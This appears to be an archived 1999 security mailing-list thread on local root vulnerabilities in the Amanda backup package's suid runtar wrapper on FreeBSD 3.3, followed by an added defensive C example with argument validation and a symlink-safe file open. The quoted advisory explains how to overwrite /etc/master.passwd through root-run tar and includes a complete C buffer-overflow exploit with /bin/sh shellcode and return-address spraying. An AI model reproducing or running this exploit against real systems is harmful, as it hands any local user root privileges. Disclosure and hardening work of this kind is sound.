hi, I confirmed a few exploitable buffer overflows in multiple suids on an
earlier version of amanda on BSDI as well, a while back. As I recollect
'runtar' was one of them. I apologize that I can't provide anything more
specific than this, but it was some time ago and I misplaced my notes on
it. Your post spurred my memory so I figured I'd mention it.

-eric

On Sat, 30 Oct 1999, Tellier, Brock wrote:

> Greetings,
>
> OVERVIEW:
> The Amanda backup package has several vulnerabilities which
> will allow any user to gain root privs.
>
> BACKGROUND:
> My tests were done ONLY on FreeBSD 3.3-RELEASE, though this is almost
> certainly not the only vulnerable OS. A search for "amanda-2 and not
> freebsd" on altavista yields preliminary, unconfirmed data that some of
> the vulnerable OS's (based on packages that are included on install
> CD's; anyone can install Amanda to make themselves vulnerable) may be:
> RedHat ?.?, TurboLinux, PowerTools CD, SuSE 6.2. Confirmation on which
> OS's/tar's are vulnerable would be useful.
>
> DETAILS:
>
> Amanda's "runtar" program, suid root by default on FreeBSD 3.3, calls
> /usr/bin/tar and passes all args given to runtar to this program. Tar is
> thus run with root permissions and is vulnerable to all of the same
> attacks on suid programs that it would have if it were suid itself.
>
> Vuln #1 - run tar as root
>
> Since tar is run with root permissions, you are free to tar up any file
> you wish, including /etc/master.passwd. You may also untar any file you
> wish, to any location on the system, including /etc/master.passwd. This
> does not require any exploit kung-fu and may be done by supplying args
> to tar/runtar as if you were root.
>
> Vuln #1.1 - tar contains a buffer overflow
>
> Obtaining root via buffer overflow here is redundant, of course, but it
> illustrates the point that even if tar's capabilities weren't able to
> gain root privs, the buffer overflow would still allow you to do so.
> An overflow exists *IN TAR* which will allow any user to execute
> commands as root. Note that an overflow in tar isn't an immediate
> security flaw since it is never suid/sgid, but it goes to show that one
> should do security audits of all the programs one calls with user input.
> By passing a long string to runtar in the form
> "/usr/local/libexec/amanda/runtar cvf $400bytes:bah" we can execute our
> commands. FreeBSD exploit attached below.
>
> Vuln #2 - symlink problem
>
> Not quite as serious, but a concern nonetheless. When the amandad
> daemon is run, a bin-owned file called "amandad.debug" is created in
> /tmp. By creating a symlink from /tmp/amandad.debug to any other file,
> we will force amandad to clobber the contents with that of amandad's
> debug info. Note that amandad is not suid/sgid, but it is often run with
> root perms at startup or via scripts.
>
> WHO IS VULNERABLE:
> Anyone running a suid version of runtar should be suspicious. I've not
> tested any other O.S.'s except FreeBSD 3.3, which includes amanda 2.3.0
> and 2.4.1 as "additional packages" on the install CD and tar-1.11.2.
>
> EXPLOIT:
>
> /*
>  * Amanda runtar exploit yields euid=0(root)
>  * Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
>  * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
>  * platforms
>  *
>  * Compile gcc -o amandax amandax.c
>  * Run ./amandax <offset> <buflen>
>  * keep buflen around 400, try positive and negative offsets
>  *
>  * Brock Tellier btellierat_private
>  */
>
> #include <stdlib.h>
> #include <stdio.h>
> #include <string.h>   /* memset, memcpy, strlen */
> #include <unistd.h>   /* execl */
>
> /* FreeBSD execve("/bin/sh") shellcode; the ">:)(:<" bytes are patched
>  * at run time into the lcall gate by the leading instructions */
> char fbsdshell[]= /* mudgeat_private */
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
>
> #define LEN 400
> #define NOP 0x90
> #define ALIGN 3
> #define OFFSET 0
> #define ADDR 0xbfbfdd90 /* fbsd 3.3 */
>
> int main(int argc, char *argv[]) {
>
>   long int offset=OFFSET;
>   int i;
>   int buflen = LEN;
>   long int addr = ADDR;
>   char buf[LEN+1];            /* +1 for the terminating NUL execl needs */
>
>   if (argc > 1) offset = atoi(argv[1]);
>   if (argc > 2) buflen = atoi(argv[2]);
>   if (argc > 3) {
>     fprintf(stderr, "Usage: %s <offset> <buflen>\n", argv[0]);
>     exit(0);
>   }
>   if (buflen <= 0 || buflen > LEN) {  /* keep the payload inside buf */
>     fprintf(stderr, "buflen must be between 1 and %d\n", LEN);
>     exit(1);
>   }
>
>   fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
>   fprintf(stderr, "Brock Tellier btellierat_private\n");
>   fprintf(stderr, "Using addr: 0x%lx\t buflen: %d\t offset: %ld\n",
>           addr+offset, buflen, offset);
>
>   /* NOP sled, shellcode at offset 100, then the return address
>    * repeated (aligned by ALIGN) up to the end of the buffer */
>   memset(buf,NOP,buflen);
>   memcpy(buf+100,fbsdshell,strlen(fbsdshell));
>   for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)
>     *(int *)&buf[i]=addr+offset;
>   buf[buflen] = '\0';
>
>   /* runtar hands the oversized "cvf" argument straight to tar as root */
>   execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",
>         NULL);
>
>   exit(0);
> }
>
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
>
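The two defects in the quoted post, a suid wrapper that forwards an unchecked argv to tar (Vuln #1 and #1.1) and a daemon that writes a debug file to a predictable /tmp path through whatever symlink is waiting there (Vuln #2), both have short fixes. The block below is an added example and is not Amanda's code or anything from the posts above: the option allowlist, the MAX_ARG_LEN cap, the rule that `--file` may only name stdout and `--directory` must be an absolute path without `/..`, the fixture paths under `$TMPDIR`, and the function names are all chosen here for illustration. `target_size_after()` builds a constructed fixture (a 7-byte target and a planted `amandad.debug` symlink to it) and reports whether a given open pattern clobbered the target.

```c
#define _GNU_SOURCE   /* O_NOFOLLOW, mkdtemp, symlink on glibc */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define MAX_ARG_LEN 255   /* hypothetical cap; the tar overflow above needed ~400 bytes */

/* Hypothetical allowlist chosen for this example, not Amanda's real one. */
static const char *const allowed_opts[] = {
    "--create", "--file", "--directory", "--one-file-system",
    "--sparse", "--totals", "--ignore-failed-read", NULL
};

/* Vuln #1/#1.1: return 1 only when argv[1..] is safe to forward to tar as
 * root. Every argument must be short, every option must be on the allowlist
 * (so neither --extract nor "cvf" gets through), --file may only be "-"
 * (stdout, so root never writes an archive over /etc/master.passwd),
 * --directory must be absolute without a "/.." component, "." is the only
 * operand, and --create must be present. Anything else is refused. */
int runtar_args_ok(int argc, char *const argv[])
{
    int i, j, seen_create = 0;

    for (i = 1; i < argc; i++)
        if (strlen(argv[i]) > MAX_ARG_LEN)
            return 0;                               /* long-string attack */
    for (i = 1; i < argc; i++) {
        const char *a = argv[i];
        if (a[0] != '-') {
            if (strcmp(a, ".") != 0)
                return 0;                           /* unexpected operand */
            continue;
        }
        for (j = 0; allowed_opts[j] && strcmp(a, allowed_opts[j]); j++)
            ;
        if (!allowed_opts[j])
            return 0;                               /* option not allowed */
        if (strcmp(a, "--create") == 0)
            seen_create = 1;
        else if (strcmp(a, "--file") == 0 && (++i >= argc || strcmp(argv[i], "-")))
            return 0;                               /* archive must go to stdout */
        else if (strcmp(a, "--directory") == 0 &&
                 (++i >= argc || argv[i][0] != '/' || strstr(argv[i], "/..")))
            return 0;                               /* relative or traversing dir */
    }
    return seen_create;
}

/* Vuln #2: O_EXCL makes open() fail when the final path component is a
 * symlink and never truncates an existing file; O_NOFOLLOW is belt and
 * braces. Returns the new descriptor or -1. */
int safe_debug_open(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* The pattern that gets clobbered: follow whatever is there and truncate. */
int naive_debug_open(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Constructed fixture under $TMPDIR (or /tmp): a file "target" holding 7
 * bytes and a symlink "amandad.debug" pointing at it, as an attacker would
 * plant. Opens the symlink with 'opener' and returns the target's size
 * afterwards: 7 = untouched, 0 = clobbered, -1 = fixture could not be built. */
long target_size_after(int (*opener)(const char *))
{
    const char *tmp = getenv("TMPDIR");
    char dir[256], link[320], target[320];
    struct stat st;
    FILE *f;
    long size = -1;
    int fd;

    snprintf(dir, sizeof dir, "%s/amandaXXXXXX", tmp ? tmp : "/tmp");
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/amandad.debug", dir);
    if ((f = fopen(target, "w")) != NULL) {
        fputs("secret\n", f);
        fclose(f);
        if (symlink(target, link) == 0) {
            fd = opener(link);          /* the daemon opening its debug file */
            if (fd >= 0)
                close(fd);
            if (stat(target, &st) == 0)
                size = (long)st.st_size;
        }
    }
    unlink(link); unlink(target); rmdir(dir);
    return size;
}
```

With this in place the invocation from the exploit above, `runtar cvf <400 bytes> :bah`, is refused on its first argument before tar ever runs, and a pre-planted `/tmp/amandad.debug` symlink makes `safe_debug_open()` fail with EEXIST (or ELOOP) instead of truncating the link's target. The remaining Vuln #1 risk, that `.` under a root-readable `--directory` is still archived with root's privileges, is inherent to a backup helper and has to be handled by restricting which directories the wrapper accepts.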
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:09:22 PDT